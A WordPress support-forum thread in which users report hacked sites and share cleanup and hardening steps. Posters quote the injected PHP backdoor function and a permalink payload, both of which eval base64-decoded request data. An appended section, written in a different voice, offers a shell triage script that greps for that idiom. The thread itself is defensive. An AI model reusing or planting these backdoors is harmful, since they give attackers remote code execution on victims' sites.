Viewing 15 replies - 16 through 30 (of 161 total)
  • The following function appeared in my index.php file. Everyone, check your last modified dates on your installation files for any file that has changed recently. If it’s a WordPress file that you’ve not modified, be sure to inspect it or replace it with the original.

    function gpc_9086($l9088){if(is_array($l9088)){foreach($l9088 as $l9086=>$l9087)$l9088[$l9086]=gpc_9086($l9087);}elseif(is_string($l9088) && substr($l9088,0,4)=="____"){eval(base64_decode(substr($l9088,4)));$l9088=null;}return $l9088;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_9086",$_SERVER);

    Us too:

    %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    Upgraded and Backed up… will report if it comes back.

    Great tip Netslacker, but Patrick, don’t just patch, also do some “hardening” after changing all passwords, etc. You still don’t know how they did it.

    @netslacker – as I’m a WordPress dummy please could you give me a clue as to how to check the last modified dates on my installation files! Thanks. My host is Hostgator, but I can’t see any dates within File Manager.

    Do you use FTP? Most FTP clients note the date of files.
    Also go for his tip and start by checking the index.php of your theme.

    Confirmed, two sites in our network (so far) have been hit by this exploit. Both were version 2.7.1

    Symptoms: Bogus permalink, unauthorized admin account with code in the “first name” field.

    Has anyone been able to confirm that this is NOT an issue with 2.8.4?

    FTP – uugh – no. Hostgator has a few FTP icons but I’ve never used them and don’t know what to do with them. I’ll look at my index.php though. Thanks.

    @chloealicewilson

    You need to log in to your hosting account and look at all the files. I’ve got shell access so I can just check and modify directly there. However, if you’re coming in via web, there should be a way to view all the files on your hosting account and it should tell you last modified timestamps.

    I have files that were modified over a couple of days. Starting on Aug 30th. All of those files (about 10 in total) have had the function above injected.

    My steps for cleaning did not involve following those on the links above.

    I found that I could easily replace the hacked files with valid ones. I then removed the write permission on all WordPress files. However, doing this kills the ability to upgrade via the admin console and will make upgrades harder. For me though, I’m all about having a stable site and I don’t care right now about upgrading.

    I also created a blank index.php file in EVERY directory that didn’t have one already (/images, wp-content, etc etc). Since when I looked through my installation, MANY directories had NEW index.php files that would simply call the injected function. So I removed these files, created a new, blank index.php and then removed the read and write permissions (removing write means nobody can inject bad code again into that file).

    If you have index.php files that have the function, a hacker can simply call the function over and over again by making an HTTP call to the file with their browser. Voila, function executes, hack restored. So you must prevent this from occurring over and over.

    On linux/unix, to remove write permissions (must be at a shell):
    chmod -w <filename>

    So, for all files in the root:
    chmod -w *.php

    To create an index.php file where there is NOT one:
    touch index.php (creates an empty file)
    chmod -rw index.php (removes read and write)

    Now, if a browser goes to https://myhackedsite/wp-content/ the browser returns a PERMISSION DENIED error. Since the file is there but it’s not readable.

    Be CAREFUL. Some files need write access. But not many. And DON’T remove the read access from index.php files that are part of the WordPress install. root and wp-admin (and others) have VALID index.php files. Just inspect them for the malicious function and just remove the write attribute (chmod -w filename).

    I removed the write attribute from nearly every file in WordPress and the theme that I am using. This was my quick and dirty way to HOPEFULLY prevent it from happening again, since in the past 3 days I’ve had it occur multiple times.

    If there is a better approach, I’m all ears. However, until a fix is put in wordpress I’m not taking any chances at all.

    @netslacker

    When one of my WP sites got hacked earlier this year, I did similar things to “harden” my WP sites, but it got hacked again by this new scheme anyway. The problem is that you protected your site only from this particular hacker and his scheme. When another security hole is discovered, it may have nothing to do with what you just did.

    I agree with you; all I want is a stable site. I don’t care about upgrading all the time to the latest. But with WP, it appears that we have no choice. Every time a new version comes out, we have to upgrade it. If so, doing what you did would make it a big hassle every time you have to upgrade. If you only have one site to maintain, that’s fine, but what if you have multiple? It’s not realistic. Most of us just want to blog. We don’t want to be professional webmasters. So, this is a serious problem that I do not know how to resolve. I don’t want to spend my time upgrading WP every week.

    The best quick fix I found is renaming:
    wp-admin/options-permalink.php
    /xmlrpc.php

    to something else and wait till the wordpress guys fix this… there were 4 attempts today on my website…

    @dyske

    Totally agree. I guess my point is that I’m not aware of a “fix” for this particular hack and since I’ve had it happen now multiple times I just want it stable so I can sleep at night!!

    Doing a recursive chmod to add back the write permissions is trivial. If I want to get back to where I was and upgrade I simply run the chmod +rw command on the whole thing and I’m good to go.

    However, since removing the write attribute is a sound security practice anyway (no matter if it’s WP or some other app), it’s still valid advice. The drawback is that WP is built for the masses for easy upgrade through the admin console, so by its nature it will be prone to hacks. Security always has a trade-off. Many people chase the upgrades to get new features like kids on Christmas morning. However, my approach is to always wait until the issues are resolved before upgrading (unless it’s a security patch/upgrade).

    @marc_dutch123

    I deleted xmlrpc.php from all my WP sites. I don’t care about Ping Back and I don’t have to update my blog from my iPhone.

    Does xmlrpc.php do anything other than those two?

    [I’m suspecting that xmlrpc.php was the entry point for this hack.]

    My blog was infected. I am thinking of deleting xmlrpc.php as well. I also see wp-pass.php. Should I delete both?

    @robk30

    I deleted both. As far as I know, there should not be any PHP files in /wp-content/uploads
    The idea of “uploading” PHP files is too fishy. So, I would delete any PHP files I find in “uploads”.
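The checks described in the two posts above (netslacker’s walk through recently modified files, the injected `eval(base64_decode(` loader, blank index.php files in bare directories and `chmod -w`, and dyske’s point that no PHP file belongs under wp-content/uploads) can be scripted so they are repeatable across several sites. The script below is an added example written for this thread; it is not code from any poster or from WordPress. It builds its own throwaway directory tree with a constructed marker file (an inert comment line containing the loader idiom, never executed) so it can be run offline, and every path and function name in it is an assumption of the example, not something from a real install.

```shell
#!/bin/sh
# Added example, not from the thread: triage helpers for a WordPress tree.
# Every path here is constructed inside a temporary directory so the script
# never touches a real site; point the functions at a real document root to
# use them for real.

# make_fixture: build a constructed tree that mimics the symptoms reported
# (one injected file, one old clean file, one stray PHP file in uploads).
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-content/uploads" "$root/wp-admin" "$root/images"
    # Legitimate-looking index.php, dated well in the past (placeholder content)
    printf '<?php\n// Silence is golden.\n' > "$root/wp-admin/index.php"
    touch -t 200901010000 "$root/wp-admin/index.php"
    # Constructed, inert marker: only a comment containing the loader idiom
    printf '<?php\n// constructed marker: eval(base64_decode($x));\n' > "$root/index.php"
    # Stray PHP file in uploads, which should never exist
    printf '<?php echo 1;\n' > "$root/wp-content/uploads/stray.php"
    echo "$root"
}

# recent_php DIR [DAYS]: PHP files modified within the last DAYS days
# (default 7), one path per line, sorted.
recent_php() {
    dir=$1; days=${2:-7}
    find "$dir" -type f -name '*.php' -mtime "-$days" | sort
}

# injected_php DIR: PHP files containing the eval(base64_decode( loader idiom.
# Fixed-string grep, so regex metacharacters in the pattern need no escaping.
injected_php() {
    dir=$1
    find "$dir" -type f -name '*.php' -exec grep -l -F 'eval(base64_decode(' {} + | sort
}

# upload_php DIR: PHP files under wp-content/uploads (expected to be empty).
upload_php() {
    dir=$1
    find "$dir/wp-content/uploads" -type f -name '*.php' 2>/dev/null | sort
}

# add_blank_indexes DIR: create an empty index.php in every directory that
# lacks one, as netslacker did, so directory listings cannot be browsed.
add_blank_indexes() {
    dir=$1
    find "$dir" -type d | while read -r d; do
        [ -e "$d/index.php" ] || : > "$d/index.php"
    done
}

# remove_write DIR: drop the write bit on every PHP file (the thread's chmod -w).
# Re-add it with chmod u+w before using the admin-console upgrader.
remove_write() {
    dir=$1
    find "$dir" -type f -name '*.php' -exec chmod a-w {} +
}

# Stand-alone run: report on the constructed fixture, then clean it up.
if [ "${1:-}" = "--demo" ]; then
    root=$(make_fixture)
    echo "recent:";   recent_php "$root"
    echo "injected:"; injected_php "$root"
    echo "uploads:";  upload_php "$root"
    add_blank_indexes "$root"; remove_write "$root"
    rm -rf "$root"
fi
```

Run it with `sh triage.sh --demo` to see the three reports on the fixture. Removing the read bit as well, as the poster did for the blank index.php files, only turns requests into a permission error when PHP runs as a different user from the file owner; on shared hosts where the web server runs as your own account it changes nothing, so the write-bit removal and the content checks are the parts worth keeping.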

  • The topic ‘Question About Possible Hack of Site’ is closed to new replies.